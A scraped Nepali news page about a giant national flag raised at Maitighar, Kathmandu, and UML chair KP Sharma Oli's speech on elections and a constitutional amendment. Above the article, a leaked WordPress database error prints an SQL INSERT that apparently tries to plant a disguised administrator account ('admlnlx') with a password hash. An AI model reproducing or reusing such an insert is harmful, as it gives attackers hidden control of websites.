WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6gw2F/Md3h90VpJ4AVUvZFdmkBTk6.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 01:36:19', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ १६ –
काठमाडौंको माइतीघरमा देशकै ठूलो दावी गरिएको नेपालको राष्ट्रिय झण्डा फहराइएको छ। नेपाली देशभक्त युवा समाजले आइतबार झण्डा फहराएको हो।
आइतबार दिउँसो आयोजित कार्यक्रममा नेकपा एमालेका अध्यक्ष केपी शर्मा ओलीले झण्डोत्तलन गरेका हुन्। उक्त झण्डाको लम्बाई १० मिटर, चौडाई ७।५ मिटर र तौल ८ किलो रहेको छ। झण्डोत्तलन गर्दै एमाले अध्यक्ष ओलीले आफूहरु संक्रमणकाल टुंग्याएर अघि बढ्न चाहेपनि सरकारले निर्वाचन गर्न नचाहेको दावी गरे। उनले सरकारले निर्वाचन नचाहेपनि एमालेले जसरी पनि निर्वाचन गराएरै छाड्ने दावी गरे। सरकारले चुनाव गर्न चाहिरहेको छैन।
एमालेले जसरी पनि निर्वाचन गराएरै छाड्छ। देशलाई संकटमा जान दिँदैनौुं उनले भने। अध्यक्ष ओलीले सरकारले संसदमा संविधान संशोधन विधेयकमा देश टुक्र्याउने प्रस्ताव ल्याएकाले आफूहरु विरोधमा उत्रिएको ओलीले दावी गरे। ुदेश टुक्र्याउने प्रस्तावको विरुद्धमा उभिँदा एमालेलाई नै देश टुक्र्याउने भनियो। नेपाली जनताले कुरा बुझेनन् भन्ने ठानेर यस्तो गरिएको हो। सञ्चारको विकास भइसक्दा पनि जनताले कुरा बुझ्दैनन् भन्ने ठान्नु सरकारको कमजोरी होु ओलीले भने।